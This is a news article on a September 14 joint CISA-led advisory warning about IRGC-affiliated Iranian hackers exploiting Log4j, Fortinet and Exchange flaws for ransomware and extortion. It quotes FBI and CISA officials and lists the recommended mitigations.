The Cybersecurity and Infrastructure Security Agency (CISA), along with its partners, released a Cybersecurity Advisory (CSA) on Sept. 14 to warn agencies about continued malicious cyber activity from actors affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC).
The CSA explains that the IRGC-affiliated actors often exploit VMware Horizon Log4j vulnerabilities for initial access, and then proceed to execute data extortion and disk encryption for ransom operations.
The initial reporting on the Iranian hackers was released in May 2021 and updated again in November. It provides information on the Iranian government-sponsored actors exploiting known Fortinet and Microsoft Exchange vulnerabilities.
Since then, the Federal Bureau of Investigation (FBI) has continued to observe the advanced persistent threat actors.
“The FBI is dedicated to preventing and disrupting nation state affiliated cyber activity that threatens our private sector partners and the American public,” said FBI Cyber Division Assistant Director Bryan Vorndran in a press release. “We will continue to coordinate with our domestic and international partners to proactively share relevant and timely information to mitigate cyber threats posed by the IRGC.”
The CSA was released as a joint effort between CISA, the FBI, the National Security Agency, U.S. Cyber Command, Cyber National Mission Force, the Department of the Treasury, the Australian Cyber Security Centre, the Canadian Centre for Cyber Security, and the United Kingdom’s National Cyber Security Centre.
“Today’s advisory is an outcome of our close collaboration with international and U.S. government partners to understand and provide timely information on malicious cyber activity targeting our country’s critical networks, including by Iranian cyber actors,” said Eric Goldstein, the executive assistant director for cybersecurity at CISA.
The advisory suggests agencies take immediate actions to mitigate an attack by IRGC-affiliated hackers by keeping systems updated, enforcing multi-factor authentication, and making offline backups of data.